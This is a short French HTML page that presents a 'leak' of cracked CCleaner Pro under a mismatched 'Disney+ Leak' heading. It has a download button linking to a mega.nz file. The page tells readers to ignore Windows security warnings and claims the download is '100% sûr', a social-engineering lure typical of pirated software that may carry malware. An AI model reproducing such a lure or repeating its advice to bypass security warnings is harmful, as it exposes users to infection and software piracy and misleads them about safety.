<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Détail du Leak</title>
    <style>
        body {
            background-color: #121212;
            color: #ffffff;
            font-family: Arial, sans-serif;
            margin: 0;
        }
        .navbar {
            background-color: #333;
            overflow: hidden;
            width: 100%;
        }
        .navbar a {
            float: left;
            display: block;
            color: #f2f2f2;
            text-align: center;
            padding: 14px 20px;
            text-decoration: none;
        }
        .navbar a:hover {
            background-color: #ddd;
            color: black;
        }
        .container {
            background-color: #1e1e1e;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            text-align: center;
            width: 60%;
            margin: 20px auto;
        }
        .container img {
            width: 100%;
            border-radius: 8px;
            margin-bottom: 20px;
        }
        .container h2 {
            margin: 20px 0;
        }
        .container p {
            text-align: left;
            margin-bottom: 20px;
        }
        .container button {
            background-color: #6200ea;
            color: #ffffff;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
        }
        .container button:hover {
            background-color: #3700b3;
        }
    </style>
</head>
<body>
    <div class="navbar">
        <a href="index.html">Home</a>
        <a href="avis.html">Avis</a>
        <a href="leak.html">Leak</a>
        <a href="notification.html">notifications</a>
    </div>

    <div class="container">
        <h2>Disney+ Leak</h2>
        <img src="trikker.jpg" alt="Image">
        <p>
            Bonjour à tous, aujourd'hui je vous présente le leak ccleaner pro. Avec ce logiciel, vous pouvez nettoyer votre pc . Ignorez les avertissements de Windows, c'est 100% sûr.
        </p>
        <a href="https://mega.nz/file/QREFnRiQ#b9dArUt7YwZzN8mFNa4U8f_EXv0bHyPpfUSrYQ5177k" target="_blank"><button>Obtenir le leak</button></a>
    </div>
</body>
</html>
